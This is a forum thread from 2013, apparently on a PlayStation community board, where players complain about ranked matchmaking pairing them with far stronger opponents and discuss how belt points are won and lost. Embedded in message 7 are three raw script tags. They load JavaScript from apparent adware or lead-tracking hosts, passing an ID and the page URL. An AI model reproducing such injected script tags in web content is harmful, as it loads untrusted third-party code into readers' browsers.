Jan 08 2013
By: coreno Big Daddy 18884 posts

Ranked games, unfair matches

9 replies 296 views Edited Jan 8, 2013

So, I was playing today, played about 3-4 good games, fought against a variety of opponents, and I was doing pretty well with Sly. Then all of a sudden I'm tossed in a match with some high ranked guys, 999 Kratos, and 999 Dante, and I was wasted. They were just out of my leauge.

The next couple of matches were like that too, players just out of my leauge, and I was just struggling to get any moves into the slaughtering.

These losses put a ding in my belt ranking, and it was kind of frustrating. Anyone else think players should be matched with others around thier ranking/skill level? It would be a fairer challenge, and more fun. And newbs wouldn't get crushed and discouraged by purple belts with rank 999 Raidens.

Message 1 of 10 (296 Views)
0 Likes
Sackboy
457 posts

Re: Ranked games, unfair matches

Jan 8, 2013

The 999s you see arent ranks those are levels (TLDR tells you how much experience that player has with the corresponding character

Message 2 of 10 (286 Views)
0 Likes
Big Daddy
18884 posts

Jan 8, 2013

StarGalaxy37 wrote:

The 999s you see arent ranks those are levels (TLDR tells you how much experience that player has with the corresponding character

Ranks/Levels tomatos/tomatos Smiley Wink I realize that the character level isn't necessarily as big a factor, but a blue belt still shouldn't have to fight a purple belt.

Message 3 of 10 (277 Views)
0 Likes
Splicer
71 posts

Jan 8, 2013

that happened to me too! idk why i get 999s when i play with a 50 lvl character... I thought they fixed that in the last patch >.<

Message 4 of 10 (273 Views)
0 Likes
Sackboy
457 posts

Jan 8, 2013

Dont know where you get your info from^

Message 5 of 10 (251 Views)
Ghost of Sparta
11942 posts

Jan 8, 2013
Matchmaking is based on belt rank, not character rank.

That being said. the matchmaking right now sucks. I quit ranked after my red belt because I was sick of being paired with people way above or below me. That, and timed matches just suck. Stock is where it's at.
Message 6 of 10 (232 Views)
0 Likes
Gaming Beast
2167 posts

Jan 8, 2013
Well, just so you know if you fight a purple belt as a blue belt, you lose almost no points for losing but you gain/they lose a LOT if you win. It's kind of unfair in both directions.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 7 of 10 (197 Views)
0 Likes
Hekseville Citizen
282 posts

Jan 8, 2013

SuperBot does the best that they can to get people around the same skill level to play each other. The best way that they can do this is by belt ranking and matching you with someone close to your belt. In my opinion, going up or down 1 or 2 belts isn't too much. Also you have to take into consideration the amount of people on at the time, and they are matching based on internet connections. Sometimes there might not be anyone on near your belt that has a proper internet connection to even play a game that won't lag out. Also, if you play someone above your belt you generally only lose 2 belt points. If you win, you gain 6-10. 

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 8 of 10 (175 Views)
0 Likes
Lombax Warrior
144 posts

Jan 8, 2013

coreno wrote:

So, I was playing today, played about 3-4 good games, fought against a variety of opponents, and I was doing pretty well with Sly. Then all of a sudden I'm tossed in a match with some high ranked guys, 999 Kratos, and 999 Dante, and I was wasted. They were just out of my leauge.

The next couple of matches were like that too, players just out of my leauge, and I was just struggling to get any moves into the slaughtering.

These losses put a ding in my belt ranking, and it was kind of frustrating. Anyone else think players should be matched with others around thier ranking/skill level? It would be a fairer challenge, and more fun. And newbs wouldn't get crushed and discouraged by purple belts with rank 999 Raidens.

This has been happening to me for the longest seems.

Since Decemeber I have been trying to go from Red Belt to Brown. Each time I get up Red 90, 95....the game always seems fit to put me up against an player that's just to difficult to beat. And it's usually the characters that can combo into there supers or have easy setups....and I've been using Nariko exclusively so far since I started playing.

Each victory I get 2, 3, maybe 4 points added to my belt (5 or 6 if I'm lucky). Then a loss....6, 9, 10, or 11 points, gone, just like that.

And when I lose once, the game just keeps matching me up with guys I have no chance at beating....resulting in a losing slump for the next couple of matches.

I want to get better with Nariko and play better players to do so, but the barrier for leveling up and crossing over to consistenly play against better competition is difficult and frustrating.

Message 9 of 10 (144 Views)
0 Likes
Highlighted
Uncharted Territory
1361 posts

[ Edited ]
Jan 8, 2013

coreno wrote:

hey look, someone with their emblem completely full :0

Message 10 of 10 (121 Views)
0 Likes